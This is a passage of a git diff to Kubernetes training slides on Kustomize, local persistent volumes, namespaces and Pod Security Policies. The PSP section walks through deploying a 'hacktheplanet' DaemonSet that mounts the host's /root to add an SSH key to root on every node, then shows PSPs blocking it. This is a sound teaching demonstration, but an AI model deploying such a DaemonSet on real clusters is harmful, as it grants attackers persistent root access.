||||
kubectl create namespace kustomcoins
|
||||
```
|
||||
|
||||
- Deploy DockerCoins:
|
||||
```bash
|
||||
kubectl apply -f rendered.yaml --namespace=kustomcoins
|
||||
```
|
||||
|
||||
- Or, with Kubernetes 1.14, you can also do this:
|
||||
```bash
|
||||
kubectl apply -k overlays/ship --namespace=kustomcoins
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Checking our new copy of DockerCoins
|
||||
|
||||
- We can check the worker logs, or the web UI
|
||||
|
||||
.exercise[
|
||||
|
||||
- Retrieve the NodePort number of the web UI:
|
||||
```bash
|
||||
kubectl get service webui --namespace=kustomcoins
|
||||
```
|
||||
|
||||
- Open it in a web browser
|
||||
|
||||
- Look at the worker logs:
|
||||
```bash
|
||||
kubectl logs deploy/worker --tail=10 --follow --namespace=kustomcoins
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
Note: it might take a minute or two for the worker to start.
|
||||
|
||||
@@ -120,7 +120,7 @@
|
||||
|
||||
- Team "build" ships ready-to-run manifests
|
||||
|
||||
(YAML, Helm Charts, Kustomize ...)
|
||||
(YAML, Helm charts, Kustomize ...)
|
||||
|
||||
- Team "run" adjusts some parameters and monitors the application
|
||||
|
||||
|
||||
slides/k8s/local-persistent-volumes.md (new file, 244 lines)
@@ -0,0 +1,244 @@
|
||||
# Local Persistent Volumes
|
||||
|
||||
- We want to run that Consul cluster *and* actually persist data
|
||||
|
||||
- But we don't have a distributed storage system
|
||||
|
||||
- We are going to use local volumes instead
|
||||
|
||||
(similar conceptually to `hostPath` volumes)
|
||||
|
||||
- We can use local volumes without installing extra plugins
|
||||
|
||||
- However, they are tied to a node
|
||||
|
||||
- If that node goes down, the volume becomes unavailable
|
||||
|
||||
---
|
||||
|
||||
## With or without dynamic provisioning
|
||||
|
||||
- We will deploy a Consul cluster *with* persistence
|
||||
|
||||
- That cluster's StatefulSet will create PVCs
|
||||
|
||||
- These PVCs will remain unbound¹ until we create local volumes manually
|
||||
|
||||
(we will basically do the job of the dynamic provisioner)
|
||||
|
||||
- Then, we will see how to automate that with a dynamic provisioner
|
||||
|
||||
.footnote[¹Unbound = without an associated Persistent Volume.]
|
||||
|
||||
---
|
||||
|
||||
## Work in a separate namespace
|
||||
|
||||
- To avoid conflicts with existing resources, let's create and use a new namespace
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create a new namespace:
|
||||
```bash
|
||||
kubectl create namespace orange
|
||||
```
|
||||
|
||||
- Switch to that namespace:
|
||||
```bash
|
||||
kns orange
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
.warning[Make sure to call that namespace `orange`, because that name is hardcoded in the YAML files.]
|
||||
|
||||
---
|
||||
|
||||
## Deploying Consul
|
||||
|
||||
- We will use a slightly different YAML file
|
||||
|
||||
- The only differences between that file and the previous one are:
|
||||
|
||||
- `volumeClaimTemplate` defined in the Stateful Set spec
|
||||
|
||||
- the corresponding `volumeMounts` in the Pod spec
|
||||
|
||||
- the namespace `orange` used for discovery of Pods
|
||||
|
||||
.exercise[
|
||||
|
||||
- Apply the persistent Consul YAML file:
|
||||
```bash
|
||||
kubectl apply -f ~/container.training/k8s/persistent-consul.yaml
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Observing the situation
|
||||
|
||||
- Let's look at Persistent Volume Claims and Pods
|
||||
|
||||
.exercise[
|
||||
|
||||
- Check that we now have an unbound Persistent Volume Claim:
|
||||
```bash
|
||||
kubectl get pvc
|
||||
```
|
||||
|
||||
- We don't have any Persistent Volume:
|
||||
```bash
|
||||
kubectl get pv
|
||||
```
|
||||
|
||||
- The Pod `consul-0` is not scheduled yet:
|
||||
```bash
|
||||
kubectl get pods -o wide
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
*Hint: leave these commands running with `-w` in different windows.*
|
||||
|
||||
---
|
||||
|
||||
## Explanations
|
||||
|
||||
- In a Stateful Set, the Pods are started one by one
|
||||
|
||||
- `consul-1` won't be created until `consul-0` is running
|
||||
|
||||
- `consul-0` has a dependency on an unbound Persistent Volume Claim
|
||||
|
||||
- The scheduler won't schedule the Pod until the PVC is bound
|
||||
|
||||
(because the PVC might be bound to a volume that is only available on a subset of nodes; for instance EBS are tied to an availability zone)
|
||||
|
||||
---
|
||||
|
||||
## Creating Persistent Volumes
|
||||
|
||||
- Let's create 3 local directories (`/mnt/consul`) on node2, node3, node4
|
||||
|
||||
- Then create 3 Persistent Volumes corresponding to these directories
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create the local directories:
|
||||
```bash
|
||||
for NODE in node2 node3 node4; do
|
||||
ssh $NODE sudo mkdir -p /mnt/consul
|
||||
done
|
||||
```
|
||||
|
||||
- Create the PV objects:
|
||||
```bash
|
||||
kubectl apply -f ~/container.training/k8s/volumes-for-consul.yaml
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Check our Consul cluster
|
||||
|
||||
- The PVs that we created will be automatically matched with the PVCs
|
||||
|
||||
- Once a PVC is bound, its pod can start normally
|
||||
|
||||
- Once the pod `consul-0` has started, `consul-1` can be created, etc.
|
||||
|
||||
- Eventually, our Consul cluster is up, and backed by "persistent" volumes
|
||||
|
||||
.exercise[
|
||||
|
||||
- Check that our Consul cluster indeed has 3 members:
|
||||
```bash
|
||||
kubectl exec consul-0 consul members
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Devil is in the details (1/2)
|
||||
|
||||
- The size of the Persistent Volumes is bogus
|
||||
|
||||
(it is used when matching PVs and PVCs together, but there is no actual quota or limit)
|
||||
|
||||
---
|
||||
|
||||
## Devil is in the details (2/2)

- This specific example worked because we had exactly 1 free PV per node:

  - if we had created multiple PVs per node ...

  - we could have ended with two PVCs bound to PVs on the same node ...

  - which would have required two pods to be on the same node ...

  - which is forbidden by the anti-affinity constraints in the StatefulSet

- To avoid that, we need to associate the PVs with a Storage Class that has:
  ```yaml
  volumeBindingMode: WaitForFirstConsumer
  ```
  (this means that a PVC will be bound to a PV only once a Pod using it is scheduled)

- See [this blog post](https://kubernetes.io/blog/2018/04/13/local-persistent-volumes-beta/) for more details
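For reference, such a Storage Class for manually provisioned local volumes could look like the sketch below (the class name is an assumption; the PVs and the `volumeClaimTemplates` would both have to reference it through `storageClassName`):

```yaml
# Hedged sketch of a StorageClass for local volumes; "local-storage"
# is an assumed name. No dynamic provisioner is involved, and binding
# is delayed until a Pod actually consumes the claim.
kind: StorageClass
apiVersion: storage.k8s.io/v1
metadata:
  name: local-storage
provisioner: kubernetes.io/no-provisioner
volumeBindingMode: WaitForFirstConsumer
```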
---
|
||||
|
||||
## Bulk provisioning
|
||||
|
||||
- It's not practical to manually create directories and PVs for each app
|
||||
|
||||
- We *could* pre-provision a number of PVs across our fleet
|
||||
|
||||
- We could even automate that with a Daemon Set:
|
||||
|
||||
- creating a number of directories on each node
|
||||
|
||||
- creating the corresponding PV objects
|
||||
|
||||
- We also need to recycle volumes
|
||||
|
||||
- ... This can quickly get out of hand
|
||||
|
||||
---
|
||||
|
||||
## Dynamic provisioning
|
||||
|
||||
- We could also write our own provisioner, which would:
|
||||
|
||||
- watch the PVCs across all namespaces
|
||||
|
||||
- when a PVC is created, create a corresponding PV on a node
|
||||
|
||||
- Or we could use one of the dynamic provisioners for local persistent volumes
|
||||
|
||||
(for instance the [Rancher local path provisioner](https://github.com/rancher/local-path-provisioner))
|
||||
|
||||
---
|
||||
|
||||
## Strategies for local persistent volumes
|
||||
|
||||
- Remember, when a node goes down, the volumes on that node become unavailable
|
||||
|
||||
- High availability will require another layer of replication
|
||||
|
||||
(like what we've just seen with Consul; or primary/secondary; etc)
|
||||
|
||||
- Pre-provisioning PVs makes sense for machines with local storage
|
||||
|
||||
(e.g. cloud instance storage; or storage directly attached to a physical machine)
|
||||
|
||||
- Dynamic provisioning makes sense for large number of applications
|
||||
|
||||
(when we can't or won't dedicate a whole disk to a volume)
|
||||
|
||||
- It's possible to mix both (using distinct Storage Classes)
|
||||
@@ -6,6 +6,24 @@
|
||||
|
||||
---
|
||||
|
||||
## Requirements
|
||||
|
||||
.warning[The exercises in this chapter should be done *on your local machine*.]
|
||||
|
||||
- `kubectl` is officially available on Linux, macOS, Windows
|
||||
|
||||
(and unofficially anywhere we can build and run Go binaries)
|
||||
|
||||
- You may skip these exercises if you are following along from:
|
||||
|
||||
- a tablet or phone
|
||||
|
||||
- a web-based terminal
|
||||
|
||||
- an environment where you can't install and run new binaries
|
||||
|
||||
---
|
||||
|
||||
## Installing `kubectl`
|
||||
|
||||
- If you already have `kubectl` on your local machine, you can skip this
|
||||
@@ -16,11 +34,11 @@
|
||||
|
||||
- Download the `kubectl` binary from one of these links:
|
||||
|
||||
[Linux](https://storage.googleapis.com/kubernetes-release/release/v1.14.1/bin/linux/amd64/kubectl)
|
||||
[Linux](https://storage.googleapis.com/kubernetes-release/release/v1.14.2/bin/linux/amd64/kubectl)
|
||||
|
|
||||
[macOS](https://storage.googleapis.com/kubernetes-release/release/v1.14.1/bin/darwin/amd64/kubectl)
|
||||
[macOS](https://storage.googleapis.com/kubernetes-release/release/v1.14.2/bin/darwin/amd64/kubectl)
|
||||
|
|
||||
[Windows](https://storage.googleapis.com/kubernetes-release/release/v1.14.1/bin/windows/amd64/kubectl.exe)
|
||||
[Windows](https://storage.googleapis.com/kubernetes-release/release/v1.14.2/bin/windows/amd64/kubectl.exe)
|
||||
|
||||
- On Linux and macOS, make the binary executable with `chmod +x kubectl`
|
||||
|
||||
@@ -65,9 +83,16 @@ Platform:"linux/amd64"}
|
||||
|
||||
- If you never used `kubectl` on your machine before: nothing to do!
|
||||
|
||||
- If you already used `kubectl` to control a Kubernetes cluster before:
|
||||
.exercise[
|
||||
|
||||
- rename `~/.kube/config` to e.g. `~/.kube/config.bak`
|
||||
- Make a copy of `~/.kube/config`; if you are using macOS or Linux, you can do:
|
||||
```bash
|
||||
cp ~/.kube/config ~/.kube/config.before.training
|
||||
```
|
||||
|
||||
- If you are using Windows, you will need to adapt this command
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -1,26 +1,65 @@
|
||||
# Namespaces
|
||||
|
||||
- We would like to deploy another copy of DockerCoins on our cluster
|
||||
|
||||
- We could rename all our deployments and services:
|
||||
|
||||
hasher → hasher2, redis → redis2, rng → rng2, etc.
|
||||
|
||||
- That would require updating the code
|
||||
|
||||
- There as to be a better way!
|
||||
|
||||
--
|
||||
|
||||
- As hinted by the title of this section, we will use *namespaces*
|
||||
|
||||
---
|
||||
|
||||
## Identifying a resource
|
||||
|
||||
- We cannot have two resources with the same name
|
||||
|
||||
(Or can we...?)
|
||||
(or can we...?)
|
||||
|
||||
--
|
||||
|
||||
- We cannot have two resources *of the same type* with the same name
|
||||
- We cannot have two resources *of the same kind* with the same name
|
||||
|
||||
(But it's OK to have a `rng` service, a `rng` deployment, and a `rng` daemon set!)
|
||||
(but it's OK to have a `rng` service, a `rng` deployment, and a `rng` daemon set)
|
||||
|
||||
--
|
||||
|
||||
- We cannot have two resources of the same type with the same name *in the same namespace*
|
||||
- We cannot have two resources of the same kind with the same name *in the same namespace*
|
||||
|
||||
(But it's OK to have e.g. two `rng` services in different namespaces!)
|
||||
(but it's OK to have e.g. two `rng` services in different namespaces)
|
||||
|
||||
--
|
||||
|
||||
- In other words: **the tuple *(type, name, namespace)* needs to be unique**
|
||||
- Except for resources that exist at the *cluster scope*
|
||||
|
||||
(In the resource YAML, the type is called `Kind`)
|
||||
(these do not belong to a namespace)
|
||||
|
||||
---
|
||||
|
||||
## Uniquely identifying a resource
|
||||
|
||||
- For *namespaced* resources:
|
||||
|
||||
the tuple *(kind, name, namespace)* needs to be unique
|
||||
|
||||
- For resources at the *cluster scope*:
|
||||
|
||||
the tuple *(kind, name)* needs to be unique
|
||||
|
||||
.exercise[
|
||||
|
||||
- List resource types again, and check the NAMESPACED column:
|
||||
```bash
|
||||
kubectl api-resources
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
@@ -59,7 +98,7 @@
|
||||
|
||||
- The two methods above are identical
|
||||
|
||||
- If we are using a tool like Helm, it will create namespaces automatically
|
||||
- Some tools like Helm will create namespaces automatically when needed
|
||||
|
||||
---
|
||||
|
||||
@@ -168,41 +207,27 @@
|
||||
|
||||
---
|
||||
|
||||
## Deploy DockerCoins with Helm
|
||||
## Deploying DockerCoins with YAML files
|
||||
|
||||
*Follow these instructions if you previously created a Helm Chart.*
|
||||
- The GitHub repository `jpetazzo/kubercoins` contains everything we need!
|
||||
|
||||
.exercise[
|
||||
|
||||
- Deploy DockerCoins:
|
||||
- Clone the kubercoins repository:
|
||||
```bash
|
||||
helm install dockercoins
|
||||
git clone https://github.com/jpetazzo/kubercoins
|
||||
```
|
||||
|
||||
- Create all the DockerCoins resources:
|
||||
```bash
|
||||
kubectl create -f kubercoins
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
In the last command line, `dockercoins` is just the local path where
|
||||
we created our Helm chart before.
|
||||
If the argument behind `-f` is a directory, all the files in that directory are processed.
|
||||
|
||||
---
|
||||
|
||||
## Deploy DockerCoins with Kustomize
|
||||
|
||||
*Follow these instructions if you previously created a Kustomize overlay.*
|
||||
|
||||
.exercise[
|
||||
|
||||
- Deploy DockerCoins:
|
||||
```bash
|
||||
kubectl apply -f rendered.yaml
|
||||
```
|
||||
|
||||
- Or, with Kubernetes 1.14, you can also do this:
|
||||
```bash
|
||||
kubectl apply -k overlays/ship
|
||||
```
|
||||
|
||||
]
|
||||
The subdirectories are *not* processed, unless we also add the `-R` flag.
|
||||
|
||||
---
|
||||
|
||||
@@ -221,46 +246,7 @@ we created our Helm chart before.
|
||||
|
||||
]
|
||||
|
||||
If the graph shows up but stays at zero, check the next slide!
|
||||
|
||||
---
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
If you did the exercises from the chapter about labels and selectors,
|
||||
the app that you just created may not work, because the `rng` service
|
||||
selector has `enabled=yes` but the pods created by the `rng` daemon set
|
||||
do not have that label.
|
||||
|
||||
How can we troubleshoot that?
|
||||
|
||||
- Query individual services manually
|
||||
|
||||
→ the `rng` service will time out
|
||||
|
||||
- Inspect the services with `kubectl describe service`
|
||||
|
||||
→ the `rng` service will have an empty list of backends
|
||||
|
||||
---
|
||||
|
||||
## Fixing the broken service
|
||||
|
||||
The easiest option is to add the `enabled=yes` label to the relevant pods.
|
||||
|
||||
.exercise[
|
||||
|
||||
- Add the `enabled` label to the pods of the `rng` daemon set:
|
||||
```bash
|
||||
kubectl label pods -l app=rng enabled=yes
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
The *best* option is to change either the service definition, or the
|
||||
daemon set definition, so that their respective selectors match correctly.
|
||||
|
||||
*This is left as an exercise for the reader!*
|
||||
If the graph shows up but stays at zero, give it a minute or two!
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -11,6 +11,7 @@
|
||||
|
||||
- Deploy everything else:
|
||||
```bash
|
||||
set -u
|
||||
for SERVICE in hasher rng webui worker; do
|
||||
kubectl create deployment $SERVICE --image=$REGISTRY/$SERVICE:$TAG
|
||||
done
|
||||
|
||||
slides/k8s/podsecuritypolicy.md (new file, 601 lines)
@@ -0,0 +1,601 @@
|
||||
# Pod Security Policies
|
||||
|
||||
- By default, our pods and containers can do *everything*
|
||||
|
||||
(including taking over the entire cluster)
|
||||
|
||||
- We are going to show an example of a malicious pod
|
||||
|
||||
- Then we will explain how to avoid this with PodSecurityPolicies
|
||||
|
||||
- We will illustrate this by creating a non-privileged user limited to a namespace
|
||||
|
||||
---
|
||||
|
||||
## Setting up a namespace
|
||||
|
||||
- Let's create a new namespace called "green"
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create the "green" namespace:
|
||||
```bash
|
||||
kubectl create namespace green
|
||||
```
|
||||
|
||||
- Change to that namespace:
|
||||
```bash
|
||||
kns green
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Using limited credentials
|
||||
|
||||
- When a namespace is created, a `default` ServiceAccount is added
|
||||
|
||||
- By default, this ServiceAccount doesn't have any access rights
|
||||
|
||||
- We will use this ServiceAccount as our non-privileged user
|
||||
|
||||
- We will obtain this ServiceAccount's token and add it to a context
|
||||
|
||||
- Then we will give basic access rights to this ServiceAccount
|
||||
|
||||
---
|
||||
|
||||
## Obtaining the ServiceAccount's token
|
||||
|
||||
- The token is stored in a Secret
|
||||
|
||||
- The Secret is listed in the ServiceAccount
|
||||
|
||||
.exercise[
|
||||
|
||||
- Obtain the name of the Secret from the ServiceAccount:
|
||||
```bash
|
||||
SECRET=$(kubectl get sa default -o jsonpath={.secrets[0].name})
|
||||
```
|
||||
|
||||
- Extract the token from the Secret object:
|
||||
```bash
|
||||
TOKEN=$(kubectl get secrets $SECRET -o jsonpath={.data.token} | base64 -d)
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Inspecting a Kubernetes token
|
||||
|
||||
- Kubernetes tokens are JSON Web Tokens
|
||||
|
||||
(as defined by [RFC 7519](https://tools.ietf.org/html/rfc7519))
|
||||
|
||||
- We can view their content (and even verify them) easily
|
||||
|
||||
.exercise[
|
||||
|
||||
- Display the token that we obtained:
|
||||
```bash
|
||||
echo $TOKEN
|
||||
```
|
||||
|
||||
- Copy paste the token in the verification form on https://jwt.io
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Authenticating using the ServiceAccount token
|
||||
|
||||
- Let's create a new *context* accessing our cluster with that token
|
||||
|
||||
.exercise[
|
||||
|
||||
- First, add the token credentials to our kubeconfig file:
|
||||
```bash
|
||||
kubectl config set-credentials green --token=$TOKEN
|
||||
```
|
||||
|
||||
- Then, create a new context using these credentials:
|
||||
```bash
|
||||
kubectl config set-context green --user=green --cluster=kubernetes
|
||||
```
|
||||
|
||||
- Check the results:
|
||||
```bash
|
||||
kubectl config get-contexts
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Using the new context
|
||||
|
||||
- Normally, this context doesn't let us access *anything* (yet)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Change to the new context with one of these two commands:
|
||||
```bash
|
||||
kctx green
|
||||
kubectl config use-context green
|
||||
```
|
||||
|
||||
- Also change to the green namespace in that context:
|
||||
```bash
|
||||
kns green
|
||||
```
|
||||
|
||||
- Confirm that we don't have access to anything:
|
||||
```bash
|
||||
kubectl get all
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Giving basic access rights
|
||||
|
||||
- Let's bind the ClusterRole `edit` to our ServiceAccount
|
||||
|
||||
- To allow access only to the namespace, we use a RoleBinding
|
||||
|
||||
(instead of a ClusterRoleBinding, which would give global access)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Switch back to `cluster-admin`:
|
||||
```bash
|
||||
kctx -
|
||||
```
|
||||
|
||||
- Create the Role Binding:
|
||||
```bash
|
||||
kubectl create rolebinding green --clusterrole=edit --serviceaccount=green:default
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Verifying access rights
|
||||
|
||||
- Let's switch back to the `green` context and check that we have rights
|
||||
|
||||
.exercise[
|
||||
|
||||
- Switch back to `green`:
|
||||
```bash
|
||||
kctx green
|
||||
```
|
||||
|
||||
- Check our permissions:
|
||||
```bash
|
||||
kubectl get all
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
We should see an empty list.
|
||||
|
||||
(Better than a series of permission errors!)
|
||||
|
||||
---
|
||||
|
||||
## Creating a basic Deployment
|
||||
|
||||
- Just to demonstrate that everything works correctly, deploy NGINX
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create a Deployment using the official NGINX image:
|
||||
```bash
|
||||
kubectl create deployment web --image=nginx
|
||||
```
|
||||
|
||||
- Confirm that the Deployment, ReplicaSet, and Pod exist, and Pod is running:
|
||||
```bash
|
||||
kubectl get all
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## One example of malicious pods
|
||||
|
||||
- We will now show an escalation technique in action
|
||||
|
||||
- We will deploy a DaemonSet that adds our SSH key to the root account
|
||||
|
||||
(on *each* node of the cluster)
|
||||
|
||||
- The Pods of the DaemonSet will do so by mounting `/root` from the host
|
||||
|
||||
.exercise[
|
||||
|
||||
- Check the file `k8s/hacktheplanet.yaml` with a text editor:
|
||||
```bash
|
||||
vim ~/container.training/k8s/hacktheplanet.yaml
|
||||
```
|
||||
|
||||
- If you would like, change the SSH key (by changing the GitHub user name)
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Deploying the malicious pods
|
||||
|
||||
- Let's deploy our "exploit"!
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create the DaemonSet:
|
||||
```bash
|
||||
kubectl create -f ~/container.training/k8s/hacktheplanet.yaml
|
||||
```
|
||||
|
||||
- Check that the pods are running:
|
||||
```bash
|
||||
kubectl get pods
|
||||
```
|
||||
|
||||
- Confirm that the SSH key was added to the node's root account:
|
||||
```bash
|
||||
sudo cat /root/.ssh/authorized_keys
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Cleaning up
|
||||
|
||||
- Before setting up our PodSecurityPolicies, clean up that namespace
|
||||
|
||||
.exercise[
|
||||
|
||||
- Remove the DaemonSet:
|
||||
```bash
|
||||
kubectl delete daemonset hacktheplanet
|
||||
```
|
||||
|
||||
- Remove the Deployment:
|
||||
```bash
|
||||
kubectl delete deployment web
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Pod Security Policies in theory
|
||||
|
||||
- To use PSPs, we need to activate their specific *admission controller*
|
||||
|
||||
- That admission controller will intercept each pod creation attempt
|
||||
|
||||
- It will look at:
|
||||
|
||||
- *who/what* is creating the pod
|
||||
|
||||
- which PodSecurityPolicies they can use
|
||||
|
||||
- which PodSecurityPolicies can be used by the Pod's ServiceAccount
|
||||
|
||||
- Then it will compare the Pod with each PodSecurityPolicy one by one
|
||||
|
||||
- If a PodSecurityPolicy accepts all the parameters of the Pod, it is created
|
||||
|
||||
- Otherwise, the Pod creation is denied and it won't even show up in `kubectl get pods`
|
||||
|
||||
---
|
||||
|
||||
## Pod Security Policies fine print

- With RBAC, using a PSP corresponds to the verb `use` on the PSP

  (that makes sense, right?)

- If no PSP is defined, no Pod can be created

  (even by cluster admins)

- Pods that are already running are *not* affected

- If we create a Pod directly, it can use a PSP to which *we* have access

- If the Pod is created by e.g. a ReplicaSet or DaemonSet, it's different:

  - the ReplicaSet / DaemonSet controllers don't have access to *our* policies

  - therefore, we need to give access to the PSP to the Pod's ServiceAccount
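For instance, granting the `psp:restricted` ClusterRole to the `default` ServiceAccount of the `green` namespace could look like the hedged sketch below (the binding name is an assumption; later exercises may use a different one):

```yaml
# Illustrative RoleBinding: lets Pods running under the default
# ServiceAccount of the green namespace use the "restricted" policy.
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: psp-restricted-for-default-sa
  namespace: green
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: psp:restricted
subjects:
- kind: ServiceAccount
  name: default
  namespace: green
```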
---
|
||||
|
||||
## Pod Security Policies in practice
|
||||
|
||||
- We are going to enable the PodSecurityPolicy admission controller
|
||||
|
||||
- At that point, we won't be able to create any more pods (!)
|
||||
|
||||
- Then we will create a couple of PodSecurityPolicies
|
||||
|
||||
- ... And associated ClusterRoles (giving `use` access to the policies)
|
||||
|
||||
- Then we will create RoleBindings to grant these roles to ServiceAccounts
|
||||
|
||||
- We will verify that we can't run our "exploit" anymore
|
||||
|
||||
---
|
||||
|
||||
## Enabling Pod Security Policies
|
||||
|
||||
- To enable Pod Security Policies, we need to enable their *admission plugin*
|
||||
|
||||
- This is done by adding a flag to the API server
|
||||
|
||||
- On clusters deployed with `kubeadm`, the control plane runs in static pods
|
||||
|
||||
- These pods are defined in YAML files located in `/etc/kubernetes/manifests`
|
||||
|
||||
- Kubelet watches this directory
|
||||
|
||||
- Each time a file is added/removed there, kubelet creates/deletes the corresponding pod
|
||||
|
||||
- Updating a file causes the pod to be deleted and recreated
|
||||
|
||||
---
|
||||
|
||||
## Updating the API server flags
|
||||
|
||||
- Let's edit the manifest for the API server pod
|
||||
|
||||
.exercise[
|
||||
|
||||
- Have a look at the static pods:
|
||||
```bash
|
||||
ls -l /etc/kubernetes/manifests
|
||||
```
|
||||
|
||||
- Edit the one corresponding to the API server:
|
||||
```bash
|
||||
sudo vim /etc/kubernetes/manifests/kube-apiserver.yaml
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Adding the PSP admission plugin
|
||||
|
||||
- There should already be a line with `--enable-admission-plugins=...`
|
||||
|
||||
- Let's add `PodSecurityPolicy` on that line
|
||||
|
||||
.exercise[
|
||||
|
||||
- Locate the line with `--enable-admission-plugins=`
|
||||
|
||||
- Add `PodSecurityPolicy`
|
||||
|
||||
(It should read `--enable-admission-plugins=NodeRestriction,PodSecurityPolicy`)
|
||||
|
||||
- Save, quit
|
||||
|
||||
]
|
||||
|
||||
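After the edit, the API server command in the manifest should look roughly like this

(the other flags vary from one cluster to another):

```yaml
spec:
  containers:
  - command:
    - kube-apiserver
    - --enable-admission-plugins=NodeRestriction,PodSecurityPolicy
    # ... all the other flags are left unchanged
```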
---
|
||||
|
||||
## Waiting for the API server to restart
|
||||
|
||||
- The kubelet detects that the file was modified
|
||||
|
||||
- It kills the API server pod, and starts a new one
|
||||
|
||||
- During that time, the API server is unavailable
|
||||
|
||||
.exercise[
|
||||
|
||||
- Wait until the API server is available again
|
||||
|
||||
]
|
||||
|
||||
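One way to do that is to poll it with a read-only command, e.g.:

```bash
while ! kubectl get nodes >/dev/null 2>&1; do sleep 1; done
```

(Any harmless `kubectl` command will do; it's pod creation that will be restricted, not reads.)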
---
|
||||
|
||||
## Check that the admission plugin is active
|
||||
|
||||
- Normally, we can't create any Pod at this point
|
||||
|
||||
.exercise[
|
||||
|
||||
- Try to create a Pod directly:
|
||||
```bash
|
||||
kubectl run testpsp1 --image=nginx --restart=Never
|
||||
```
|
||||
|
||||
- Try to create a Deployment:
|
||||
```bash
|
||||
kubectl run testpsp2 --image=nginx
|
||||
```
|
||||
|
||||
- Look at existing resources:
|
||||
```bash
|
||||
kubectl get all
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
We can get hints about what's happening by looking at the ReplicaSet and the Events.
|
||||
|
||||
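For example, with commands like these (the exact resource names depend on what `kubectl run` generated):

```bash
kubectl describe replicasets
kubectl get events --sort-by=.metadata.creationTimestamp | tail
```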
---
|
||||
|
||||
## Introducing our Pod Security Policies
|
||||
|
||||
- We will create two policies:
|
||||
|
||||
- privileged (allows everything)
|
||||
|
||||
- restricted (blocks some unsafe mechanisms)
|
||||
|
||||
- For each policy, we also need an associated ClusterRole granting *use*
|
||||
|
||||
---
|
||||
|
||||
## Creating our Pod Security Policies
|
||||
|
||||
- We have a couple of files, each defining a PSP and associated ClusterRole:
|
||||
|
||||
- `k8s/psp-privileged.yaml`: policy `privileged`, role `psp:privileged`
|
||||
- `k8s/psp-restricted.yaml`: policy `restricted`, role `psp:restricted`
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create both policies and their associated ClusterRoles:
|
||||
```bash
|
||||
kubectl create -f ~/container.training/k8s/psp-restricted.yaml
|
||||
kubectl create -f ~/container.training/k8s/psp-privileged.yaml
|
||||
```
|
||||
]
|
||||
|
||||
- The privileged policy comes from [the Kubernetes documentation](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#example-policies)
|
||||
|
||||
- The restricted policy is inspired by that same documentation page
|
||||
|
||||
---
|
||||
|
||||
## Binding the restricted policy
|
||||
|
||||
- Let's bind the role `psp:restricted` to ServiceAccount `green:default`
|
||||
|
||||
(aka the default ServiceAccount in the green Namespace)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create the following RoleBinding:
|
||||
```bash
|
||||
kubectl create rolebinding psp:restricted \
|
||||
--clusterrole=psp:restricted \
|
||||
--serviceaccount=green:default
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Trying it out
|
||||
|
||||
- Let's switch to the `green` context, and try to create resources
|
||||
|
||||
.exercise[
|
||||
|
||||
- Switch to the `green` context:
|
||||
```bash
|
||||
kctx green
|
||||
```
|
||||
|
||||
- Create a simple Deployment:
|
||||
```bash
|
||||
kubectl create deployment web --image=nginx
|
||||
```
|
||||
|
||||
- Look at the Pods that have been created:
|
||||
```bash
|
||||
kubectl get all
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Trying to hack the cluster
|
||||
|
||||
- Let's create the same DaemonSet we used earlier
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create a hostile DaemonSet:
|
||||
```bash
|
||||
kubectl create -f ~/container.training/k8s/hacktheplanet.yaml
|
||||
```
|
||||
|
||||
- Look at the state of the namespace:
|
||||
```bash
|
||||
kubectl get all
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## What's in our restricted policy?
|
||||
|
||||
- The restricted PSP is similar to the one provided in the docs, but:
|
||||
|
||||
- it allows containers to run as root
|
||||
|
||||
- it doesn't drop capabilities
|
||||
|
||||
- Many containers run as root by default, and would require additional tweaks
|
||||
|
||||
- Many containers use e.g. `chown`, which requires a specific capability
|
||||
|
||||
(that's the case for the NGINX official image, for instance)
|
||||
|
||||
- We still block: hostPath, privileged containers, and much more!
|
||||
|
||||
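As an illustration, a policy implementing the above could look like this

(a simplified sketch; not the exact content of `k8s/psp-restricted.yaml`):

```yaml
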